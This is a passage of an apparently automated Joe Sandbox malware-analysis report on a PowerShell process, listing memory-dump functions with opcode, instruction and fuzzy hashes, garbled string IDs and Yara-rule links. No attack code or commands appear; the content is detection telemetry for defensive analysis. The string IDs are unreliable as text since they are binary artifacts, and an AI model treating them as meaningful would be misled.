                                                    • Opcode Fuzzy Hash: da81014789b80ba45d47d6c3cad316afa0288b0de54501439260d3a8660e47be
                                                    • Instruction Fuzzy Hash: 15F0F6323046149FD71597A5DC90ABF7BE9EF8A2A0B00056EE049C7251CB34AC09C760
                                                    Function 009FD9A7 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2200622129.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_9fd000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32a03d52a0d983e30ec78fc81cd7b1ed2439d2c9eb8fdd4c0e38ae6520eb7683
                                                    • Instruction ID: 62e890b5f420830952780c6c30ef0df9e5589e2eb38f519cfa79839028681f81
                                                    • Opcode Fuzzy Hash: 32a03d52a0d983e30ec78fc81cd7b1ed2439d2c9eb8fdd4c0e38ae6520eb7683
                                                    • Instruction Fuzzy Hash: A3F04976201604AF9720CF0AD984C23FBAEEFC4770319C49AE94A8B612C671EC41CFA0
                                                    Function 009FD998 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2200622129.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_9fd000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 368b4b237957661b2c9f616281e53ca0110858cad5f8d6a507ced3ba17289d38
                                                    • Instruction ID: 7352cc5e4c285c9a75f57eb80629ac442a1cdaf8c552fb699981cab118ef582b
                                                    • Opcode Fuzzy Hash: 368b4b237957661b2c9f616281e53ca0110858cad5f8d6a507ced3ba17289d38
                                                    • Instruction Fuzzy Hash: 0AF04975101680AFD721CF06CD84D23BBBEEB85724B298489E84A8B312C671FC42CF60
                                                    Function 041C6E70 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d2078b42d1b71bfc927fc0d072e869d2f2de59745270e7649b7f67c078556b12
                                                    • Instruction ID: 01c3a82acb6e04bae837edf8e2a0379b7cd129f830c66f6bd25bd4769dd8e84d
                                                    • Opcode Fuzzy Hash: d2078b42d1b71bfc927fc0d072e869d2f2de59745270e7649b7f67c078556b12
                                                    • Instruction Fuzzy Hash: 6BF0A0323006189FD7149AA9EC84E6FB7EAEBCD2A5B00052DE10AD3310DF34AC4587A4
                                                    Function 041C7E88 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d449e57b33442367611afff0571c596c3c630bfd7506a473ea66a8bf5663fc5f
                                                    • Instruction ID: c4ba57f3e370288b68c48de55e2182e075decc0dd56a2da6c9444bcf27b0e396
                                                    • Opcode Fuzzy Hash: d449e57b33442367611afff0571c596c3c630bfd7506a473ea66a8bf5663fc5f
                                                    • Instruction Fuzzy Hash: 6EF0822630C7905BDB0627B4A8282EEBF65EBC6768F0500AFE08987243CE2C1915C7D6
                                                    Function 041C8608 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6434be81371f3e021254ff1ed27823c3eee6c5d389afc6c4011f9ebe23d9aff0
                                                    • Instruction ID: 5624b8fc71769a54c79f3abe449564087ccc362d81b05bf1cd4f072636302ab4
                                                    • Opcode Fuzzy Hash: 6434be81371f3e021254ff1ed27823c3eee6c5d389afc6c4011f9ebe23d9aff0
                                                    • Instruction Fuzzy Hash: FFF027B17002081BE3406B64D0483ABB7A6CFC471CF14C12ED60A47385CE393D06CBD1
                                                    Function 041CD34F Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 887973f8586d75f0bd5b57929206fabbbe470842809c0c3280c985c9dc81ed5c
                                                    • Instruction ID: 9a58f714a0363aec067556788cbb3d2db7fda4f5cfe994d203fd5c1d05cdc1eb
                                                    • Opcode Fuzzy Hash: 887973f8586d75f0bd5b57929206fabbbe470842809c0c3280c985c9dc81ed5c
                                                    • Instruction Fuzzy Hash: 3EE06D753001008F83149B1DE894C6ABBEAEFCE61131A10AEE545CB730CF21EC028B90
                                                    Function 041CD350 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d8acb05398f376c0fc1fc31c93076f9f968c99d6c545c6162154c7d59d23817
                                                    • Instruction ID: c0a15190a209b882ad13d23ba31eeb115cec389954c167653623539c70716484
                                                    • Opcode Fuzzy Hash: 0d8acb05398f376c0fc1fc31c93076f9f968c99d6c545c6162154c7d59d23817
                                                    • Instruction Fuzzy Hash: 08E06D753001008F83049B1DE894C2AB7EAEFCE61131A10AEE545CB330CB21EC028B80
                                                    Function 041C8688 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6358cf8fe56a81afe7484d50743b7bc3641180e0c4c3545ac09665b31cc86c58
                                                    • Instruction ID: c6ee77ef903ab0d36c98135a8dd8a16f90a4d99a0832cd5e5c8889fb4bec2266
                                                    • Opcode Fuzzy Hash: 6358cf8fe56a81afe7484d50743b7bc3641180e0c4c3545ac09665b31cc86c58
                                                    • Instruction Fuzzy Hash: DAF06D709017144FD3609FB8D4DC3AABBE5FB44314F00482DE10ED7341DB3968408B91
                                                    Function 041CA4A8 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 249e96c0a73ec6550e1345563528aa58e379c5dfbc8dde5a3f06d575879de40e
                                                    • Instruction ID: b81865f1843305afe5a3b272925637da734de909815e62095a5db122d5eb35b0
                                                    • Opcode Fuzzy Hash: 249e96c0a73ec6550e1345563528aa58e379c5dfbc8dde5a3f06d575879de40e
                                                    • Instruction Fuzzy Hash: 1BD02B23718299179B0A822FAC205573FDBCFD6A1031DC0BEF108CB340ED16EC024791
                                                    Function 041C868A Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f18e3551ce2fcfefc307b9c55f240ae036adfb1c6165c21f1af380dce405c53
                                                    • Instruction ID: 462f455899c195059d4bbd6d754866bb3b3efbbdf7a2a4ed52ff2cf4b936d9a2
                                                    • Opcode Fuzzy Hash: 5f18e3551ce2fcfefc307b9c55f240ae036adfb1c6165c21f1af380dce405c53
                                                    • Instruction Fuzzy Hash: 7BE0ED709017144FD7649F78D4DC3AABBE5FB84314F00486DE15ED7241DB3969418B51
                                                    Function 041CD19F Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cf04152b8ae55882c9d9cdee188aca9f1e98e99ce1cd75d0b851b09f5f710c2f
                                                    • Instruction ID: 85740807313b1a9afef5ff7b8448dedcdc328bb44eda13df74754f63b864db68
                                                    • Opcode Fuzzy Hash: cf04152b8ae55882c9d9cdee188aca9f1e98e99ce1cd75d0b851b09f5f710c2f
                                                    • Instruction Fuzzy Hash: 1FE08C31300A14178625666EB821AAF7BDADFC46A1315803EE51D87B00DF68ED068BE6
                                                    Function 041CD1EF Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f6213b41f78a288361b32a6e1d7e939edcbebe8bd5068ef01715306caafe36e
                                                    • Instruction ID: adf30c6545241a36af1a4426693fdce4806c185558eb9890e1a1db33bd063c26
                                                    • Opcode Fuzzy Hash: 0f6213b41f78a288361b32a6e1d7e939edcbebe8bd5068ef01715306caafe36e
                                                    • Instruction Fuzzy Hash: 95E08635B00114A78B0895A9E9514E9FBA5DBCC220F04847FDD0AA7740EF32691686E1
                                                    Function 041C7E98 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ffdbd8488750f2eaaae705bba407396e2730903a3a0569b95d341e471980cdc
                                                    • Instruction ID: 7e06b25c50fa67095c38be82460babdb0ed3e48fb6617add11cbdae9e0df7cc2
                                                    • Opcode Fuzzy Hash: 4ffdbd8488750f2eaaae705bba407396e2730903a3a0569b95d341e471980cdc
                                                    • Instruction Fuzzy Hash: 4EE04F36304A145BEB0927B5E85C2AEBA56EBD476DF00402DE50A87342CF7D690183DA
                                                    Function 041CD1A0 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6a4aa4e03cb21f703c9040f191df3a1ad267bf764331136f69abe65b4e182caf
                                                    • Instruction ID: 953855209d1aefce76bc5c9309bc5539b550ff891df1f232bc1d9a0b8a4f76e5
                                                    • Opcode Fuzzy Hash: 6a4aa4e03cb21f703c9040f191df3a1ad267bf764331136f69abe65b4e182caf
                                                    • Instruction Fuzzy Hash: FEE08C31300A14178615666EB820A5F77DADFC46A1315803EE51D87700DF68ED068BD5
                                                    Function 041CD1F0 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                    • Instruction ID: 50bd060ceb7ad16b7936bcce304401827b72ecd753351a2aa12abcb10c8e66e9
                                                    • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                    • Instruction Fuzzy Hash: 19E08631B00114978B089599E9504D9F7A5DBCC220F04847EDD0AA7340EF32691686E1
                                                    Function 041C8A70 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a59d7fec2c9a2ae1ff4e1d21fa72b742cece8c134d6ace88f5a5e27a9009d947
                                                    • Instruction ID: 3546a98c14845fe32ea7ce74bc90805e656d89987d946c7f2cf88e528427ab1a
                                                    • Opcode Fuzzy Hash: a59d7fec2c9a2ae1ff4e1d21fa72b742cece8c134d6ace88f5a5e27a9009d947
                                                    • Instruction Fuzzy Hash: D5D05E923101661B265430AB1CC16BBD2CF8ED84A6B0A007E9B09C7642EF40EC0103E1
                                                    Function 041C8A72 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3522a614fcdf6034f36eeb0ef9b350eea7b25d1aac713af4cf2c127cba723cc9
                                                    • Instruction ID: 2d2a375463665929b575e59a3852fd7fc48f12f32561a3245d1f0adc79c5884f
                                                    • Opcode Fuzzy Hash: 3522a614fcdf6034f36eeb0ef9b350eea7b25d1aac713af4cf2c127cba723cc9
                                                    • Instruction Fuzzy Hash: 3DD0C7A27100661F265475BE2CD16FBC3CB8EE855770A417E9B09C7641DF40DC0143E1
                                                    Function 041CFCD8 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c869421de82d0d289fa8339095451cce10e25cd710a1cfcf3d3562b1277e326
                                                    • Instruction ID: 85792e7d01e0887ed2c4dfda05c54221605024837652a8cd22130f8b3448cc96
                                                    • Opcode Fuzzy Hash: 5c869421de82d0d289fa8339095451cce10e25cd710a1cfcf3d3562b1277e326
                                                    • Instruction Fuzzy Hash: FDE01270D042599FC740DFB888515AAFFF0EB09204F2485AED95CD7211E2319602CF91
                                                    Function 041CFCE8 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                    • Instruction ID: 77edfbf27c4149158c7d835d8a389d17c80aa9a51e7cc4fe0b07952cac1d3fd0
                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                    • Instruction Fuzzy Hash: D5D042B0D042099F8784EFA9894166EFBF5AB59200B6085AA8919E7251E7329A128BD1
                                                    Function 041C7C68 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e7c82e81db178b5b1e11644582bdc06c27ad4e2cdf4a193322cf14397b3b43ae
                                                    • Instruction ID: a330b519a9f81ec89c9459a88b0a1a9a669678d4ce9204a5e3abfed888df1a71
                                                    • Opcode Fuzzy Hash: e7c82e81db178b5b1e11644582bdc06c27ad4e2cdf4a193322cf14397b3b43ae
                                                    • Instruction Fuzzy Hash: C8D0173080440A8BCB08ABA5EC5A4BEBB74EA20305F40406DEA07526C1EB342946CF84
                                                    Function 041C7D30 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 489f51650ccfc76d66de73d3900465a565f591f9c844cc41fe3da07b573a83c4
                                                    • Instruction ID: 0109c072a8a4a407be93f0a0990e05b00de963053533873cd767b0a227736a7b
                                                    • Opcode Fuzzy Hash: 489f51650ccfc76d66de73d3900465a565f591f9c844cc41fe3da07b573a83c4
                                                    • Instruction Fuzzy Hash: 25D01734A042098B8748EFA8E89A46EBBB4EB48204F004269D90A93780EA302C41CFC1
                                                    Function 041C73B0 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e732b0f11b614494939763f6e09dbb78e414637b8a8bd2ab8f13001e3b7b9663
                                                    • Instruction ID: 0220796defb149e8196a2ddd04eec815168c600e7c2f789c92dd5ac337b7d8de
                                                    • Opcode Fuzzy Hash: e732b0f11b614494939763f6e09dbb78e414637b8a8bd2ab8f13001e3b7b9663
                                                    • Instruction Fuzzy Hash: AFC08C1710A3E20FEF5383324A883D53F724B43336B0C84C3D0408A063881C9F06E322
                                                    Function 041C7C6C Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab2011c405c7b66e7e0c1b7b96c11e22fc50251939a4fea998d13b4cf103ef4c
                                                    • Instruction ID: 7e269e5984027d321d454ee0ba331da7cf1905aa75b934fb4e8187c84edb68f8
                                                    • Opcode Fuzzy Hash: ab2011c405c7b66e7e0c1b7b96c11e22fc50251939a4fea998d13b4cf103ef4c
                                                    • Instruction Fuzzy Hash: 33D0173180041A8BCF08CB61D8990FDBF70EA25209B00409DD50352581EB342546CF40
                                                    Function 041C7D34 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a077f280ebb487ec01c185df9c6b1d7a37f378438c8d17f8143d8bd5390edb8
                                                    • Instruction ID: 07b209a156b63832d7d09a4feca1ee49ed05bdb78061fe9e8e5359bb8ec7cdfa
                                                    • Opcode Fuzzy Hash: 0a077f280ebb487ec01c185df9c6b1d7a37f378438c8d17f8143d8bd5390edb8
                                                    • Instruction Fuzzy Hash: D0D0A73460000A8BC708DB24DC5987DBF71EB41218B40038DD9461B6C1DB312C43CB81
                                                    Function 041C6E38 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8992f439e7ee26d4ff30eb53d65d6f794a7aaed3bccc0efdb6e4a96d31a1f496
                                                    • Instruction ID: b3b3e23a578902935595ad4e1c84ef0be2944c2d0b5f566b43d00e0c197838df
                                                    • Opcode Fuzzy Hash: 8992f439e7ee26d4ff30eb53d65d6f794a7aaed3bccc0efdb6e4a96d31a1f496
                                                    • Instruction Fuzzy Hash: E4D0A93080E3C58FCB079B7498908243F209E0712870400EEC88B4E9A3C52E8448CF0B
                                                    Function 041C6E48 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87f5359d6319604362e601d88fca7d9a643646f0ec93e09ad73056d38eac60ba
                                                    • Instruction ID: 377cd95cd31b6a6c24d8475969009e990327ae29f7dba3b586ff2525138f6add
                                                    • Opcode Fuzzy Hash: 87f5359d6319604362e601d88fca7d9a643646f0ec93e09ad73056d38eac60ba
                                                    • Instruction Fuzzy Hash: F3B09230044B0CCFC2486F79A8448157329EB45219B8044ECE90E0A2928E3AE889CE45
                                                    Function 041CB26F Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe04c2e19a517bcf109f5978f4376a6c0d521bbbcac813168f25cfacedf6a351
                                                    • Instruction ID: e3cec5744a0b3617fb3650687481b5950f20ce37508e8c944f71fd2c0df368c9
                                                    • Opcode Fuzzy Hash: fe04c2e19a517bcf109f5978f4376a6c0d521bbbcac813168f25cfacedf6a351
                                                    • Instruction Fuzzy Hash: 11A0222C3023300AFB2C0E330B083FA3BAA2EC02C3B08C0A2B000C0080CE3CC0802300

                                                    Non-executed Functions

                                                    Function 04570F85 Relevance: 20.3, Strings: 16, Instructions: 294COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2245304363.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_4570000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fbq$84Kl$84Kl$`Q]q$`Q]q$`Q]q$`Q]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                    • API String ID: 0-2892487482
                                                    • Opcode ID: f44d3db8b227fa65dcd2240f978fcd8319470482cabee56abf90fe7b88d119e7
                                                    • Instruction ID: ca9241a79d3431501ce740d075f34e58bd2c752603d3d7fadd4dfb2782ddaa9e
                                                    • Opcode Fuzzy Hash: f44d3db8b227fa65dcd2240f978fcd8319470482cabee56abf90fe7b88d119e7
                                                    • Instruction Fuzzy Hash: 4EB1EE30700619DFDB24CE69E854AAEBBE6FF85341F148875E8019B391DB34EC45EBA1
                                                    Function 041CFA68 Relevance: 10.2, Strings: 8, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,aq$0o@p$$]q$$]q$$]q$$]q$$]q$$]q
                                                    • API String ID: 0-3294546130
                                                    • Opcode ID: a7d41653fabda7af4a5a284f098baa5403c03eea9aeca54151d34dc2c433a64e
                                                    • Instruction ID: 9cfdde30d1c04f18308c52a625aeb7655920f1b981647e8a01d2948b20e0c8f5
                                                    • Opcode Fuzzy Hash: a7d41653fabda7af4a5a284f098baa5403c03eea9aeca54151d34dc2c433a64e
                                                    • Instruction Fuzzy Hash: F24174743804118FC71D6B799DE4E3D6697AFAC70031108AED926CB3E9EF58E8428766
                                                    Function 041CF558 Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0o@p$0o@p$0o@p$$]q$$]q
                                                    • API String ID: 0-4161401491
                                                    • Opcode ID: a573991499c91a320b89e6169432b99f07517c4b1378867b15d542f013d47a1e
                                                    • Instruction ID: edf294156481c24e113a1d6726a1c305525bd5fe2b4d2f82bd22595ab5625855
                                                    • Opcode Fuzzy Hash: a573991499c91a320b89e6169432b99f07517c4b1378867b15d542f013d47a1e
                                                    • Instruction Fuzzy Hash: 5CD183307501218FDB14AF398C94B2A76DB9FD9714B2644AED902DB3E5EF74EC028791
                                                    Function 041C6F2B Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tMMl$`^q$`^q$`^q$`^q
                                                    • API String ID: 0-369650739
                                                    • Opcode ID: 368484fcbd219875fc0deabedc99fea512d9ba6a3e6906b6733568cd33fa5c94
                                                    • Instruction ID: b4e80d0cbdbf83d056156d60241d706f18bcfa50649fb1c00d0966c239d3607e
                                                    • Opcode Fuzzy Hash: 368484fcbd219875fc0deabedc99fea512d9ba6a3e6906b6733568cd33fa5c94
                                                    • Instruction Fuzzy Hash: 22B1B674E002099FDB54DFA9D990A9DFBF6FF88300F10862AE419AB355DB74A905CF90
                                                    Function 041C6F38 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tMMl$`^q$`^q$`^q$`^q
                                                    • API String ID: 0-369650739
